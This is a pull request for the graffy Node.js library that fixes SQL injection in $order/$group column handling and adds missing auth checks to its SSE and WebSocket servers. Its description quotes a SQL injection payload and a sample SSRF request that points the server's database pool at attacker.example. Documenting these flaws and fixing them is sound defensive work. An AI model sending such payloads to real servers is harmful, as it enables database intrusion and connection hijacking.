### PR TITLE
minor security fixes

### DIFF
--- a/.github/workflows/node.js.yml
+++ b/.github/workflows/node.js.yml
@@ -5,16 +5,16 @@ name: Node.js CI
 
 on:
   push:
-    branches: [ next ]
+    branches: [next]
   pull_request:
-    branches: [ next ]
+    branches: [next]
 
 jobs:
   build:
     runs-on: ubuntu-latest
     strategy:
       matrix:
-        node-version: [20.x]
+        node-version: [20.x, 22.x, 24.x]
     steps:
       - uses: actions/checkout@v4
       - name: Use Node.js ${{ matrix.node-version }}

--- a/package.json
+++ b/package.json
@@ -9,7 +9,7 @@
     "url": "git+https://github.com/aravindet/graffy.git"
   },
   "scripts": {
-    "format": "biome check --apply .",
+    "format": "biome check --write .",
     "lint": "biome ci .",
     "package": "./scripts/package.js",
     "start": "node src/example/server.js",

--- a/src/pg/sql/clauses.js
+++ b/src/pg/sql/clauses.js
@@ -137,9 +137,9 @@ export function cubeLiteralSql(value) {
   }
   return Array.isArray(value[0])
     ? sql`cube(${vertexSql(value[0], sql`'-Infinity'`)}, ${vertexSql(
-      value[1],
-      sql`'Infinity'`,
-    )})`
+        value[1],
+        sql`'Infinity'`,
+      )})`
     : sql`cube(${vertexSql(value, 0)})`;
 }
 

--- a/src/pg/sql/clauses.js
+++ b/src/pg/sql/clauses.js
@@ -20,9 +20,14 @@ const getJsonBuildValue = (value) => {
   return sql`${JSON.stringify(stripAttributes(value))}::jsonb`;
 };
 
+function colName(prefix, options) {
+  if (!options.schema.types[prefix]) throw Error(`pg.no_column ${prefix}`);
+  return raw(prefix);
+}
+
 export const lookup = (prop, options) => {
   const [prefix, ...suffix] = prop.split('.');
-  if (!suffix.length) return sql`"${raw(prefix)}"`;
+  if (!suffix.length) return sql`"${colName(prefix, options)}"`;
 
   const { types } = options.schema;
   if (types[prefix] === 'jsonb') {
@@ -132,9 +137,9 @@ export function cubeLiteralSql(value) {
   }
   return Array.isArray(value[0])
     ? sql`cube(${vertexSql(value[0], sql`'-Infinity'`)}, ${vertexSql(
-        value[1],
-        sql`'Infinity'`,
-      )})`
+      value[1],
+      sql`'Infinity'`,
+    )})`
     : sql`cube(${vertexSql(value, 0)})`;
 }
 

--- a/src/pg/sql/getArgSql.js
+++ b/src/pg/sql/getArgSql.js
@@ -8,7 +8,7 @@ import { getAggMeta, getArgMeta } from './getMeta';
   Uses the args object (typically passed in the $key attribute)
 
   @param {object} args
-  @param {{prefix: string, idCol: string, verDefault: string}} options
+  @param {{prefix: string, idCol: string, verDefault: string, schema: { types: Record<string, any> } }} options
 
   @typedef { import('sql-template-tag').Sql } Sql
   @return {{ meta: Sql, where: Sql[], order?: Sql, group?: Sql, limit: number, ensureSingleRow: boolean }}
@@ -48,18 +48,29 @@ export default function getArgSql(
       ensureSingleRow: $group === true,
     };
 
+  const { types = {} } = options.schema;
+
   const groupCols =
     Array.isArray($group) &&
     $group.length &&
-    $group.map((prop) => lookup(prop, options));
+    $group.map((prop) => {
+      const colPrefix = prop.split('.')[0];
+      if (!types[colPrefix])
+        throw Error(`pg.no_column ${colPrefix}`);
+      return lookup(prop, options);
+    });
 
   const group = groupCols ? join(groupCols, ', ') : undefined;
 
-  const orderCols = ($order || [idCol]).map((orderItem) =>
-    orderItem[0] === '!'
-      ? sql`-(${lookup(orderItem.slice(1), options)})::float8`
-      : lookup(orderItem, options),
-  );
+  const orderCols = ($order || [idCol]).map((orderItem) => {
+    const col = orderItem[0] === '!' ? orderItem.slice(1) : orderItem;
+    const colPrefix = col.split('.')[0];
+    if ($order && !types[colPrefix])
+      throw Error(`pg.no_column ${colPrefix}`);
+    return orderItem[0] === '!'
+      ? sql`-(${lookup(col, options)})::float8`
+      : lookup(orderItem, options);
+  });
 
   Object.entries({ $after, $before, $since, $until }).forEach(
     ([name, value]) => {
@@ -72,8 +83,7 @@ export default function getArgSql(
     join(
       ($order || [idCol]).map((orderItem) =>
         orderItem[0] === '!'
-          ? sql`${lookup(orderItem.slice(1), options)} ${
-              $last ? sql`ASC` : sql`DESC`
+          ? sql`${lookup(orderItem.slice(1), options)} ${$last ? sql`ASC` : sql`DESC`
             }`
           : sql`${lookup(orderItem, options)} ${$last ? sql`DESC` : sql`ASC`}`,
       ),

--- a/src/pg/sql/getArgSql.js
+++ b/src/pg/sql/getArgSql.js
@@ -48,27 +48,18 @@ export default function getArgSql(
       ensureSingleRow: $group === true,
     };
 
-  const { types = {} } = options.schema;
-
   const groupCols =
     Array.isArray($group) &&
     $group.length &&
-    $group.map((prop) => {
-      const colPrefix = prop.split('.')[0];
-      if (!types[colPrefix]) throw Error(`pg.no_column ${colPrefix}`);
-      return lookup(prop, options);
-    });
+    $group.map((prop) => lookup(prop, options));
 
   const group = groupCols ? join(groupCols, ', ') : undefined;
 
-  const orderCols = ($order || [idCol]).map((orderItem) => {
-    const col = orderItem[0] === '!' ? orderItem.slice(1) : orderItem;
-    const colPrefix = col.split('.')[0];
-    if ($order && !types[colPrefix]) throw Error(`pg.no_column ${colPrefix}`);
-    return orderItem[0] === '!'
-      ? sql`-(${lookup(col, options)})::float8`
-      : lookup(orderItem, options);
-  });
+  const orderCols = ($order || [idCol]).map((orderItem) =>
+    orderItem[0] === '!'
+      ? sql`-(${lookup(orderItem.slice(1), options)})::float8`
+      : lookup(orderItem, options),
+  );
 
   Object.entries({ $after, $before, $since, $until }).forEach(
     ([name, value]) => {

--- a/src/pg/sql/getArgSql.js
+++ b/src/pg/sql/getArgSql.js
@@ -55,8 +55,7 @@ export default function getArgSql(
     $group.length &&
     $group.map((prop) => {
       const colPrefix = prop.split('.')[0];
-      if (!types[colPrefix])
-        throw Error(`pg.no_column ${colPrefix}`);
+      if (!types[colPrefix]) throw Error(`pg.no_column ${colPrefix}`);
       return lookup(prop, options);
     });
 
@@ -65,8 +64,7 @@ export default function getArgSql(
   const orderCols = ($order || [idCol]).map((orderItem) => {
     const col = orderItem[0] === '!' ? orderItem.slice(1) : orderItem;
     const colPrefix = col.split('.')[0];
-    if ($order && !types[colPrefix])
-      throw Error(`pg.no_column ${colPrefix}`);
+    if ($order && !types[colPrefix]) throw Error(`pg.no_column ${colPrefix}`);
     return orderItem[0] === '!'
       ? sql`-(${lookup(col, options)})::float8`
       : lookup(orderItem, options);
@@ -83,7 +81,8 @@ export default function getArgSql(
     join(
       ($order || [idCol]).map((orderItem) =>
         orderItem[0] === '!'
-          ? sql`${lookup(orderItem.slice(1), options)} ${$last ? sql`ASC` : sql`DESC`
+          ? sql`${lookup(orderItem.slice(1), options)} ${
+              $last ? sql`ASC` : sql`DESC`
             }`
           : sql`${lookup(orderItem, options)} ${$last ? sql`DESC` : sql`ASC`}`,
       ),

--- a/src/pg/test/sql/clauses.test.js
+++ b/src/pg/test/sql/clauses.test.js
@@ -90,7 +90,9 @@ describe('clauses', () => {
 
   test('lookup_cannot_lookup_throws', () => {
     const options = { schema: { types: { name: 'text' } } };
-    expect(() => lookup('name.sub', options)).toThrow('pg.cannot_lookup name.sub');
+    expect(() => lookup('name.sub', options)).toThrow(
+      'pg.cannot_lookup name.sub',
+    );
   });
 
   test('OptimisedJsonBuild', () => {

--- a/src/pg/test/sql/clauses.test.js
+++ b/src/pg/test/sql/clauses.test.js
@@ -4,6 +4,7 @@ import {
   getJsonBuildTrusted,
   getSelectCols,
   getUpdates,
+  lookup,
 } from '../../sql/clauses';
 import expectSql from '../expectSql';
 
@@ -65,6 +66,31 @@ describe('clauses', () => {
     };
     const query = getSelectCols(options);
     expectSql(query, sql`*`);
+  });
+
+  test('lookup_known_column', () => {
+    const options = { schema: { types: { name: 'text' } } };
+    expectSql(lookup('name', options), sql`"name"`);
+  });
+
+  test('lookup_unknown_column_throws', () => {
+    const options = { schema: { types: { name: 'text' } } };
+    expect(() => lookup('unknown', options)).toThrow('pg.no_column unknown');
+  });
+
+  test('lookup_jsonb_path', () => {
+    const options = { schema: { types: { data: 'jsonb' } } };
+    expectSql(lookup('data.field', options), sql`"data" #> ${['field']}`);
+  });
+
+  test('lookup_cube_index', () => {
+    const options = { schema: { types: { coords: 'cube' } } };
+    expectSql(lookup('coords.0', options), sql`"coords" ~> ${0}`);
+  });
+
+  test('lookup_cannot_lookup_throws', () => {
+    const options = { schema: { types: { name: 'text' } } };
+    expect(() => lookup('name.sub', options)).toThrow('pg.cannot_lookup name.sub');
   });
 
   test('OptimisedJsonBuild', () => {

--- a/src/pg/test/sql/select.test.js
+++ b/src/pg/test/sql/select.test.js
@@ -147,7 +147,9 @@ describe('select_sql', () => {
       schema: { types: { id: 'text' } },
       verDefault: 'current_timestamp',
     };
-    expect(() => selectByArgs(arg, null, options)).toThrow('pg.no_column unknown');
+    expect(() => selectByArgs(arg, null, options)).toThrow(
+      'pg.no_column unknown',
+    );
   });
 
   test('selectByArgs_group_unknown_column_throws', () => {
@@ -160,7 +162,9 @@ describe('select_sql', () => {
       schema: { types: {} },
       verDefault: 'current_timestamp',
     };
-    expect(() => selectByArgs(arg, null, options)).toThrow('pg.no_column unknown');
+    expect(() => selectByArgs(arg, null, options)).toThrow(
+      'pg.no_column unknown',
+    );
   });
 
   // test('selectByArgs_json manipulation', () => {});

--- a/src/pg/test/sql/select.test.js
+++ b/src/pg/test/sql/select.test.js
@@ -11,7 +11,7 @@ describe('select_sql', () => {
       prefix: ['user'],
       idCol: 'id',
       verCol: 'version',
-      schema: { types: {} },
+      schema: { types: { name: 'text', id: 'text' } },
       verDefault: 'current_timestamp',
     };
     const expectedResult = sql`
@@ -74,6 +74,7 @@ describe('select_sql', () => {
       prefix: ['user'],
       idCol: 'id',
       verCol: 'version',
+      schema: { types: { createTime: 'timestamp', id: 'text' } },
       verDefault: 'current_timestamp',
     };
     const expectedResult = sql`
@@ -96,6 +97,7 @@ describe('select_sql', () => {
       prefix: ['user'],
       idCol: 'id',
       verCol: 'version',
+      schema: { types: { createTime: 'timestamp', id: 'text' } },
       verDefault: 'current_timestamp',
     };
     const expectedResult = sql`
@@ -133,6 +135,32 @@ describe('select_sql', () => {
     `;
 
     expectSql(selectByArgs(arg, null, options), expectedResult);
+  });
+
+  test('selectByArgs_order_unknown_column_throws', () => {
+    const arg = { $order: ['unknown', 'id'], $first: 10 };
+    const options = {
+      table: 'user',
+      prefix: ['user'],
+      idCol: 'id',
+      verCol: 'version',
+      schema: { types: { id: 'text' } },
+      verDefault: 'current_timestamp',
+    };
+    expect(() => selectByArgs(arg, null, options)).toThrow('pg.no_column unknown');
+  });
+
+  test('selectByArgs_group_unknown_column_throws', () => {
+    const arg = { $group: ['unknown'], $first: 10 };
+    const options = {
+      table: 'user',
+      prefix: ['user'],
+      idCol: 'id',
+      verCol: 'version',
+      schema: { types: {} },
+      verDefault: 'current_timestamp',
+    };
+    expect(() => selectByArgs(arg, null, options)).toThrow('pg.no_column unknown');
   });
 
   // test('selectByArgs_json manipulation', () => {});

--- a/src/pg/test/sql/select.test.js
+++ b/src/pg/test/sql/select.test.js
@@ -122,6 +122,7 @@ describe('select_sql', () => {
       prefix: ['user'],
       idCol: 'id',
       verCol: 'version',
+      schema: { types: { createTime: 'timestamp', id: 'text' } },
       verDefault: 'current_timestamp',
     };
     const expectedResult = sql`

--- a/src/server/httpServer.js
+++ b/src/server/httpServer.js
@@ -25,6 +25,16 @@ export default function server(store, { auth } = {}) {
         const qParam = parsed.query.q && String(parsed.query.q);
         const query = qParam && unpack(JSON.parse(decodeURIComponent(qParam)));
         if (req.headers.accept === 'text/event-stream') {
+          if (auth && !(await auth('watch', decodeQuery(query), options))) {
+            const body = 'unauthorized';
+            res.writeHead(401, {
+              'Content-Type': 'text/plain',
+              'Content-Length': Buffer.byteLength(body),
+            });
+            res.end(body);
+            return;
+          }
+
           res.setHeader('content-type', 'text/event-stream');
 
           const keepAlive = setInterval(() => {

--- a/src/server/wsServer.js
+++ b/src/server/wsServer.js
@@ -1,4 +1,4 @@
-import { pack, unpack } from '@graffy/common';
+import { decodeGraph, decodeQuery, pack, unpack } from '@graffy/common';
 import { WebSocketServer } from 'ws';
 
 import debug from 'debug';
@@ -7,7 +7,15 @@ const log = debug('graffy:server:ws');
 
 const PING_INTERVAL = 30000;
 
-export default function server(store) {
+/**
+ * @typedef {import('@graffy/core').default} GraffyStore
+ * @param {GraffyStore} store
+ * @param {{
+ *   auth?: (operation: string, payload: any, options: any) => Promise<boolean>
+ * } | undefined} options
+ * @returns
+ */
+export default function server(store, { auth } = {}) {
   if (!store) throw new Error('server.store_undef');
 
   const wss = new WebSocketServer({ noServer: true });
@@ -22,6 +30,15 @@ export default function server(store) {
         if (id === ':pong') {
           ws.pingPending = false;
           return;
+        }
+
+        if (auth && op !== 'unwatch') {
+          const decoded =
+            op === 'write' ? decodeGraph(payload) : decodeQuery(payload);
+          if (!(await auth(op, decoded, options))) {
+            ws.send(JSON.stringify([id, 'unauthorized']));
+            return;
+          }
         }
 
         switch (op) {


### PR DESCRIPTION
- [x] SQL injection — $order/$group column names in pg queries were passed directly to raw() SQL without any schema check, allowing arbitrary column expressions to be injected. Column prefixes are now validated against options.schema.types before lookup() is called, throwing pg.no_column for unrecognized names.

This fixes queries like-
```js
{ "$first": 10, "$order": ["id\"+(SELECT current_user)--"] }
```

- [x] Auth bypass on GET/SSE — The auth callback was only invoked for POST requests. GET requests that establish SSE watch subscriptions bypassed auth entirely. The auth check is now applied at the start of the SSE path, consistent with the POST path.
- [x] No auth in WebSocket server — The WS server had no auth mechanism at all. It now accepts an optional auth callback in its second argument (matching the HTTP server's interface) and applies it to all read/write/watch operations.


TODO:
- [ ] SSRF via pgClient option — Client-supplied options were passed unmodified to store.call(), which eventually reaches new Pool(options) in the pg layer. An attacker could supply a pgClient config that redirects database connections to an arbitrary host. pgClient is now stripped from user-supplied options in both HTTP and WebSocket servers before they reach the store.

<details>
<summary>
SSRF via user-supplied pgClient option
</summary>

##  Background

### The vulnerability

HTTP request options are read directly from a URL query parameter and WebSocket message options are read from the raw JSON frame — both via JSON.parse — with no filtering before being forwarded to store.call(). This means an external client can supply any key in options, including pgClient.

The attack path in src/pg/index.js:

```js
  function read(query, options, next) {
    const { pgClient } = options;                       // attacker-controlled
    const db = pgClient ? new Db(pgClient) : defaultDb; // branches on it
    ...
  }
```

And in src/pg/Db.js:
```js
  constructor(connection) {
    if (connection instanceof Pool || connection instanceof Client) {
      this.client = connection;     // real Pool/Client: used directly
    } else {
      this.client = new Pool(connection); // plain object: new Pool(attacker config)
    }
  }
```

Since the attacker's value is a plain JSON object (not a real Pool or Client instance), the instanceof check falls through to new Pool(connection). The pg module's Pool constructor accepts any object with host, port, database, user, password, etc. identical to what an attacker can send as JSON.

 ### A minimal exploit in a GET request:

GET /api?q=...&opts=%7B%22pgClient%22%3A%7B%22host%22%3A%22attacker.example%22%2C%22port%22%3A5432%2C%22database%22%3A%22postgres%22%7D%7D

This causes the server to open a new TCP connection to attacker.example:5432 for every query triggered by that request.
</details>